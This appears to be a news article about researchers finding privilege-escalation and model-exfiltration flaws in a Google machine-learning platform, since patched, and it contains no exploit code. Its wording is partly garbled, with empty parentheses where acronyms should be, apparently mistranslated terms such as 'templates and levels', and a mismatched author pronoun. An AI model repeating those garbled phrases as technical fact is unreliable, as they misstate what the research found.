Many vulnerabilities have been discovered in the platform, which could potentially allow attackers to steal valuable machine learning () and large language models () developed internally by the company.

These vulnerabilities include the possibility of privilege escalation and data leakage through infected templates. The first vulnerability involves privilege escalation through custom processes in the pipeline. Using these exploits, researchers were able to access data they should not have access to, including cloud storage and tables. Attackers could leverage this to download sensitive data and models.

The second vulnerability has proven to be more dangerous. Researchers have demonstrated that when an infected model is uploaded from a public repository to the platform, it can access all other models already deployed in the environment. This allows attackers to copy and download customized templates and levels, which may contain unique and sensitive information.

During the research process, experts created their own infection models and deployed them in a test environment. They then managed to access the platform's service accounts and steal other models, including adapter files used for configuration. These files, which contain key elements such as weights, can significantly alter the behavior of the underlying models.

The study found that the implementation of a single model, even without extensive testing, could lead to the leakage of intellectual property and company data. To avoid such threats, researchers recommend isolating test and production environments and strictly controlling access to the deployment of new models.

Google responded swiftly to the vulnerability discovered by researchers, releasing updates and deploying fixes to eliminate potential attack vectors. Now, the platform is more secure, minimizing the risks of unauthorized access and data loss.

Any vulnerable AI model could become a Trojan horse, allowing access to the entire enterprise infrastructure. In an era where data is our most powerful weapon, even a single missed security moment could result in millions of dollars in losses. Only strict control and continuous verification at every implementation stage can protect intellectual assets from information leakage.

author-gravatar

Author: Emma

An experienced news writer, focusing on in-depth reporting and analysis in the fields of economics, military, technology, and warfare. With over 20 years of rich experience in news reporting and editing, he has set foot in various global hotspots and witnessed many major events firsthand. His works have been widely acclaimed and have won numerous awards.

This post has 5 comments:

Leave a comment: